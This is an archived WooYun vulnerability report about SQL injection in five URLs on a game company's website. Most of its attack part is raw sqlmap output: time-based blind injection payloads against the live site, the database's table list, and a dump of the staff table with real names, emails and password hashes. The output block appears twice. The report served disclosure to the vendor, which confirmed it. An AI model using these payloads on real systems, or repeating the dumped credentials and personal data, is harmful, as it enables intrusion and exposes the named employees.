乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-30: 细节已通知厂商并且等待厂商处理中 2015-06-01: 厂商已经确认,细节仅向厂商公开 2015-06-11: 细节向核心白帽子及相关领域专家公开 2015-06-21: 细节向普通白帽子公开 2015-07-01: 细节向实习白帽子公开 2015-07-16: 细节向公众公开
sql注入打包
sql注入点注入点1:
http://xy.linkong.com/activity/love_code/_ajax.html.php?option=*&qid=1011&timeStame=1432905762461n62363&types=1
option参数存在sql注入注入点2:
http://xy.linkong.com/picture.php?page=2&sort_id=*
sort_id参数存在sql注入注入点3:
http://xy.linkong.com/xml/bcastr.php?num=5&sort_id=*
sort_id参数存在sql注入注入点4:
http://xy.linkong.com/xml/common.php?num=5&sort_id=*
sort_id参数存在sql注入注入点5:
http://xy.linkong.com/wallpaper.php?page=2&sort_id=*
sort_id 参数存在sql注入sqlmap证明注意参数level=5 --no-cast (level=5)
sqlmap identified the following injection points with a total of 2367 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1 Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: Apacheback-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1 Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1 Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1 Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: Apacheback-end DBMS: MySQL 5current user: '[email protected]'current user is DBA: Falseavailable databases [2]:[*] information_schema[*] xy_webDatabase: xy_web[234 tables]+--------------------------------------------+| xy_act_oldgame_log || xy_act_prize_log || xy_act_prize_log_20131224 || xy_activity_10wan || xy_activity_10wan_card || xy_activity_10wan_info || xy_activity_10wan_info2nd || xy_activity_10wan_lottery || xy_activity_20100815 || xy_activity_20100815_info_log || xy_activity_20100815_netpas_code_log || xy_activity_20100815_taobao_invite || xy_activity_20100815_taobao_sales || xy_activity_20100815_taobao_sales_log || xy_activity_2011midautumn_ecard || xy_activity_2011midautumn_items || xy_activity_2011midautumn_userinfo || xy_activity_300wan || xy_activity_6gift_getlog || xy_activity_6gift_log || xy_activity_6gift_sign || xy_activity_activation_log || xy_activity_army_draw_log || xy_activity_army_info || xy_activity_army_member || xy_activity_army_vote_log || xy_activity_armycreate_log || xy_activity_armygetgift_log || xy_activity_back || xy_activity_beautyvote_player || xy_activity_beautyvote_voter || xy_activity_blissfulcard_cdkey || xy_activity_blissfulcard_log || xy_activity_brother_activate_log || xy_activity_brother_code_log || xy_activity_bysf_guestbook || xy_activity_bysf_log || xy_activity_bysf_passport || xy_activity_bysf_question || xy_activity_chit_code || xy_activity_date || xy_activity_date_log || xy_activity_duowanvip_code || xy_activity_duowanvip_log || xy_activity_familybattle_army || xy_activity_familybattle_army_back || xy_activity_familybattle_army_prepare || xy_activity_familybattle_army_prepare_back || xy_activity_familybattle_armychief || xy_activity_familybattle_armychief_back || xy_activity_familybattle_lottery_log || xy_activity_fenliulottery_log || xy_activity_first_cdkey || xy_activity_first_cdkey_state || xy_activity_foyuan_cdkey || xy_activity_foyuan_log || xy_activity_foyuan_message || xy_activity_getchit_log || xy_activity_gg_cdkey || xy_activity_gg_cdkey_state || xy_activity_gh_level || xy_activity_goldeneyes_cdkey || xy_activity_goldeneyes_cdkey_state || xy_activity_goldeneyes_dayinfo || xy_activity_goldeneyes_doublekey || xy_activity_guestbook || xy_activity_hopewall || xy_activity_hopewall_bless || xy_activity_huikui_answer_log || xy_activity_huikui_lottery_log || xy_activity_jh2_log || xy_activity_jh2_member || xy_activity_jh2_taobao || xy_activity_jh2_taobao_log || xy_activity_jh_log || xy_activity_jh_member || xy_activity_jianding_log || xy_activity_jianmianhui || xy_activity_jiaozi_log || xy_activity_joinarmy_log || xy_activity_journey_cdkey || xy_activity_journey_cdkey_state || xy_activity_journey_dayinfo || xy_activity_journey_gc || xy_activity_journey_gc_log || xy_activity_king_log || xy_activity_kingbattle_army || xy_activity_kingbattle_army_prepare || xy_activity_kingbattle_armychief || xy_activity_kingbattle_lottery_log || xy_activity_lostself_code_log || xy_activity_lostself_exchange_log || xy_activity_lostself_transfer_log || xy_activity_lover || xy_activity_lv20_log || xy_activity_lv20_member || xy_activity_lv30_log || xy_activity_lv30_log1 || xy_activity_lv40_card_10 || xy_activity_lv40_card_30 || xy_activity_lv40_log || xy_activity_lv40_member || xy_activity_lv60_log1 || xy_activity_makewishes || xy_activity_makewishes_draw_log || xy_activity_meeting || xy_activity_name_log || xy_activity_namegc_log || xy_activity_neg_player || xy_activity_neg_voter || xy_activity_new_act || xy_activity_newact_itemlog || xy_activity_newlottery || xy_activity_newyear_log || xy_activity_nverguo2 || xy_activity_nverguo_cdkey || xy_activity_nverguo_log || xy_activity_old_player || xy_activity_oldfriends1_gift_log || xy_activity_oldfriends1_verify_inviter || xy_activity_oldfriends_exchange_log || xy_activity_oldfriends_inviter || xy_activity_oldfriends_oldplayer || xy_activity_oldfriends_verify_inviter || xy_activity_opg_card || xy_activity_opg_log || xy_activity_opg_turnround_card || xy_activity_opg_turnround_log || xy_activity_opg_user || xy_activity_package_card || xy_activity_package_card_log || xy_activity_package_gift_log || xy_activity_pagoda_log || xy_activity_people_vote_check || xy_activity_people_vote_log || xy_activity_people_vote_man_log || xy_activity_privilege_card || xy_activity_privilege_log || xy_activity_qb || xy_activity_qb2nd || xy_activity_qb3rd || xy_activity_qb4th || xy_activity_qb5th || xy_activity_qb5th_bak || xy_activity_qixi || xy_activity_qmxscj_card || xy_activity_qmxscj_log || xy_activity_qqlz || xy_activity_qqlz_cdkey || xy_activity_rally_giver || xy_activity_rally_invitee || xy_activity_renzheng_log || xy_activity_rushlevel || xy_activity_shenlian_cdkey || xy_activity_shenlian_cdkey_log || xy_activity_song_log || xy_activity_songfinal_userinfo || xy_activity_songfinal_voteinfo || xy_activity_survey_code || xy_activity_survey_log || xy_activity_survey_question || xy_activity_tequan_card || xy_activity_tequan_log || xy_activity_vote_log || xy_activity_vote_query || xy_activity_welfare_cdkey || xy_activity_welfare_log || xy_activity_welfare_message || xy_activity_wudidong_chongji || xy_activity_wudidong_jifen || xy_activity_xunyou_ge || xy_activity_xunyou_ge_cdkey || xy_activity_xunyou_log || xy_activity_xyl || xy_activity_xyvip_gift_log || xy_activity_xyvip_log || xy_activity_zhailing_cdkey || xy_activity_zhailing_log || xy_activity_zhanbu || xy_activity_zhuanpan || xy_activity_zhuanpan_voucher || xy_activity_zhuanpan_voucher_log || xy_activity_zhufu_bless || xy_activity_zhufu_log || xy_activity_zhufu_lottery || xy_address || xy_article || xy_article_demo || xy_article_inserl || xy_build || xy_channel || xy_columns || xy_comment || xy_demo || xy_download || xy_editors_inserl || xy_flash || xy_grading || xy_group || xy_image || xy_image_inserl || xy_jnh_5173card_log || xy_jnh_gift || xy_jnh_gift_log || xy_jnh_luck || xy_jnh_luck_log || xy_jnh_passport_log || xy_jnh_receive_log || xy_login_game_history || xy_lottery_20100209_state || xy_lottery_count || xy_lottery_log || xy_mall_exchange_log || xy_mall_lottery_log || xy_member || xy_pass_card_list || xy_pass_card_list_log || xy_passportstat || xy_sort || xy_special_like_vote || xy_special_taici_vote || xy_taobao_voucher || xy_taobao_voucher_log || xy_template || xy_types || xy_url || xy_url_inserl || xy_vote || xy_vote_inserl || xy_vote_option || xy_wj_article || xy_wj_article_inserl || xy_wj_image || xy_wj_image_inserl |+--------------------------------------------+Database: xy_webTable: xy_member[26 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| address_id | int(11) || article_id | int(11) || group_id | int(11) || id | int(11) || image_id | int(11) || nickname | varchar(64) || uadd_time | datetime || url_id | int(11) || user_age | date || user_Dreply | int(11) || user_Dtopic | int(11) || user_email | varchar(32) || user_grading | varchar(64) || user_jointime | datetime || user_like | varchar(255) || user_movephone | varchar(32) || user_msn | varchar(128) || user_name | varchar(32) || user_passwd | varchar(32) || user_perfect | int(11) || user_qq | int(11) || user_sex | int(2) || user_state | int(2) || user_Treply | int(11) || user_Ttopic | int(11) || vote_id | int(11) |+----------------+--------------+Database: xy_webTable: xy_member[12 entries]+-------------------------+------------+-----------+----------------------------------+| user_email | nickname | user_name | user_passwd |+-------------------------+------------+-----------+----------------------------------+| [email protected] | shixi | 实习生 | 003be2507cfad94f1efb32fe3fd0d0ec || [email protected] | lz | 李治 | cd9dac6dbb33988a3214e7ba85d272fc || [email protected] | liuzg | 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 || <blank> | tech | 运维值班工程师 | de61d9913528e5cc7c0668ad72f53730 || <blank> | sc | 邵辰 | d54185b71f614c30a396ac4bc44d3269 || [email protected] | doyo | 董勇 | 862f3760ca3293437b53cac01b0ffe29 || <blank> | ly | 卢媛 | e728b47751c6555942cb60f97d1e4553 || <blank> | hqy | 韩秋莹 | 2f090f77c0d55fdf508e324140050160 || <blank> | zc | 张晨 | 89af113d6dd2855f21cabe600370c8f0 || <blank> | xyjchanpin | 若若 | f5bf48aa40cad7891eb709fcf1fde128 || <blank> | kf | 孔飞 | d3789a3f91258fcf605452196e19c21c || <blank> | fj | 冯娟 | d320fe2508d6dbbd97efe367e2798408 |+-------------------------+------------+-----------+----------------------------------+
[*] information_schema[*] xy_webDatabase: xy_web[234 tables]+--------------------------------------------+| xy_act_oldgame_log || xy_act_prize_log || xy_act_prize_log_20131224 || xy_activity_10wan || xy_activity_10wan_card || xy_activity_10wan_info || xy_activity_10wan_info2nd || xy_activity_10wan_lottery || xy_activity_20100815 || xy_activity_20100815_info_log || xy_activity_20100815_netpas_code_log || xy_activity_20100815_taobao_invite || xy_activity_20100815_taobao_sales || xy_activity_20100815_taobao_sales_log || xy_activity_2011midautumn_ecard || xy_activity_2011midautumn_items || xy_activity_2011midautumn_userinfo || xy_activity_300wan || xy_activity_6gift_getlog || xy_activity_6gift_log || xy_activity_6gift_sign || xy_activity_activation_log || xy_activity_army_draw_log || xy_activity_army_info || xy_activity_army_member || xy_activity_army_vote_log || xy_activity_armycreate_log || xy_activity_armygetgift_log || xy_activity_back || xy_activity_beautyvote_player || xy_activity_beautyvote_voter || xy_activity_blissfulcard_cdkey || xy_activity_blissfulcard_log || xy_activity_brother_activate_log || xy_activity_brother_code_log || xy_activity_bysf_guestbook || xy_activity_bysf_log || xy_activity_bysf_passport || xy_activity_bysf_question || xy_activity_chit_code || xy_activity_date || xy_activity_date_log || xy_activity_duowanvip_code || xy_activity_duowanvip_log || xy_activity_familybattle_army || xy_activity_familybattle_army_back || xy_activity_familybattle_army_prepare || xy_activity_familybattle_army_prepare_back || xy_activity_familybattle_armychief || xy_activity_familybattle_armychief_back || xy_activity_familybattle_lottery_log || xy_activity_fenliulottery_log || xy_activity_first_cdkey || xy_activity_first_cdkey_state || xy_activity_foyuan_cdkey || xy_activity_foyuan_log || xy_activity_foyuan_message || xy_activity_getchit_log || xy_activity_gg_cdkey || xy_activity_gg_cdkey_state || xy_activity_gh_level || xy_activity_goldeneyes_cdkey || xy_activity_goldeneyes_cdkey_state || xy_activity_goldeneyes_dayinfo || xy_activity_goldeneyes_doublekey || xy_activity_guestbook || xy_activity_hopewall || xy_activity_hopewall_bless || xy_activity_huikui_answer_log || xy_activity_huikui_lottery_log || xy_activity_jh2_log || xy_activity_jh2_member || xy_activity_jh2_taobao || xy_activity_jh2_taobao_log || xy_activity_jh_log || xy_activity_jh_member || xy_activity_jianding_log || xy_activity_jianmianhui || xy_activity_jiaozi_log || xy_activity_joinarmy_log || xy_activity_journey_cdkey || xy_activity_journey_cdkey_state || xy_activity_journey_dayinfo || xy_activity_journey_gc || xy_activity_journey_gc_log || xy_activity_king_log || xy_activity_kingbattle_army || xy_activity_kingbattle_army_prepare || xy_activity_kingbattle_armychief || xy_activity_kingbattle_lottery_log || xy_activity_lostself_code_log || xy_activity_lostself_exchange_log || xy_activity_lostself_transfer_log || xy_activity_lover || xy_activity_lv20_log || xy_activity_lv20_member || xy_activity_lv30_log || xy_activity_lv30_log1 || xy_activity_lv40_card_10 || xy_activity_lv40_card_30 || xy_activity_lv40_log || xy_activity_lv40_member || xy_activity_lv60_log1 || xy_activity_makewishes || xy_activity_makewishes_draw_log || xy_activity_meeting || xy_activity_name_log || xy_activity_namegc_log || xy_activity_neg_player || xy_activity_neg_voter || xy_activity_new_act || xy_activity_newact_itemlog || xy_activity_newlottery || xy_activity_newyear_log || xy_activity_nverguo2 || xy_activity_nverguo_cdkey || xy_activity_nverguo_log || xy_activity_old_player || xy_activity_oldfriends1_gift_log || xy_activity_oldfriends1_verify_inviter || xy_activity_oldfriends_exchange_log || xy_activity_oldfriends_inviter || xy_activity_oldfriends_oldplayer || xy_activity_oldfriends_verify_inviter || xy_activity_opg_card || xy_activity_opg_log || xy_activity_opg_turnround_card || xy_activity_opg_turnround_log || xy_activity_opg_user || xy_activity_package_card || xy_activity_package_card_log || xy_activity_package_gift_log || xy_activity_pagoda_log || xy_activity_people_vote_check || xy_activity_people_vote_log || xy_activity_people_vote_man_log || xy_activity_privilege_card || xy_activity_privilege_log || xy_activity_qb || xy_activity_qb2nd || xy_activity_qb3rd || xy_activity_qb4th || xy_activity_qb5th || xy_activity_qb5th_bak || xy_activity_qixi || xy_activity_qmxscj_card || xy_activity_qmxscj_log || xy_activity_qqlz || xy_activity_qqlz_cdkey || xy_activity_rally_giver || xy_activity_rally_invitee || xy_activity_renzheng_log || xy_activity_rushlevel || xy_activity_shenlian_cdkey || xy_activity_shenlian_cdkey_log || xy_activity_song_log || xy_activity_songfinal_userinfo || xy_activity_songfinal_voteinfo || xy_activity_survey_code || xy_activity_survey_log || xy_activity_survey_question || xy_activity_tequan_card || xy_activity_tequan_log || xy_activity_vote_log || xy_activity_vote_query || xy_activity_welfare_cdkey || xy_activity_welfare_log || xy_activity_welfare_message || xy_activity_wudidong_chongji || xy_activity_wudidong_jifen || xy_activity_xunyou_ge || xy_activity_xunyou_ge_cdkey || xy_activity_xunyou_log || xy_activity_xyl || xy_activity_xyvip_gift_log || xy_activity_xyvip_log || xy_activity_zhailing_cdkey || xy_activity_zhailing_log || xy_activity_zhanbu || xy_activity_zhuanpan || xy_activity_zhuanpan_voucher || xy_activity_zhuanpan_voucher_log || xy_activity_zhufu_bless || xy_activity_zhufu_log || xy_activity_zhufu_lottery || xy_address || xy_article || xy_article_demo || xy_article_inserl || xy_build || xy_channel || xy_columns || xy_comment || xy_demo || xy_download || xy_editors_inserl || xy_flash || xy_grading || xy_group || xy_image || xy_image_inserl || xy_jnh_5173card_log || xy_jnh_gift || xy_jnh_gift_log || xy_jnh_luck || xy_jnh_luck_log || xy_jnh_passport_log || xy_jnh_receive_log || xy_login_game_history || xy_lottery_20100209_state || xy_lottery_count || xy_lottery_log || xy_mall_exchange_log || xy_mall_lottery_log || xy_member || xy_pass_card_list || xy_pass_card_list_log || xy_passportstat || xy_sort || xy_special_like_vote || xy_special_taici_vote || xy_taobao_voucher || xy_taobao_voucher_log || xy_template || xy_types || xy_url || xy_url_inserl || xy_vote || xy_vote_inserl || xy_vote_option || xy_wj_article || xy_wj_article_inserl || xy_wj_image || xy_wj_image_inserl |+--------------------------------------------+Database: xy_webTable: xy_member[26 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| address_id | int(11) || article_id | int(11) || group_id | int(11) || id | int(11) || image_id | int(11) || nickname | varchar(64) || uadd_time | datetime || url_id | int(11) || user_age | date || user_Dreply | int(11) || user_Dtopic | int(11) || user_email | varchar(32) || user_grading | varchar(64) || user_jointime | datetime || user_like | varchar(255) || user_movephone | varchar(32) || user_msn | varchar(128) || user_name | varchar(32) || user_passwd | varchar(32) || user_perfect | int(11) || user_qq | int(11) || user_sex | int(2) || user_state | int(2) || user_Treply | int(11) || user_Ttopic | int(11) || vote_id | int(11) |+----------------+--------------+Database: xy_webTable: xy_member[12 entries]+-------------------------+------------+-----------+----------------------------------+| user_email | nickname | user_name | user_passwd |+-------------------------+------------+-----------+----------------------------------+| [email protected] | shixi | 实习生 | 003be2507cfad94f1efb32fe3fd0d0ec || [email protected] | lz | 李治 | cd9dac6dbb33988a3214e7ba85d272fc || [email protected] | liuzg | 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 || <blank> | tech | 运维值班工程师 | de61d9913528e5cc7c0668ad72f53730 || <blank> | sc | 邵辰 | d54185b71f614c30a396ac4bc44d3269 || [email protected] | doyo | 董勇 | 862f3760ca3293437b53cac01b0ffe29 || <blank> | ly | 卢媛 | e728b47751c6555942cb60f97d1e4553 || <blank> | hqy | 韩秋莹 | 2f090f77c0d55fdf508e324140050160 || <blank> | zc | 张晨 | 89af113d6dd2855f21cabe600370c8f0 || <blank> | xyjchanpin | 若若 | f5bf48aa40cad7891eb709fcf1fde128 || <blank> | kf | 孔飞 | d3789a3f91258fcf605452196e19c21c || <blank> | fj | 冯娟 | d320fe2508d6dbbd97efe367e2798408 |+-------------------------+------------+-----------+----------------------------------+
参数过滤
危害等级:高
漏洞Rank:11
确认时间:2015-06-01 11:10
感谢指出的问题,已安排相关人员处理
暂无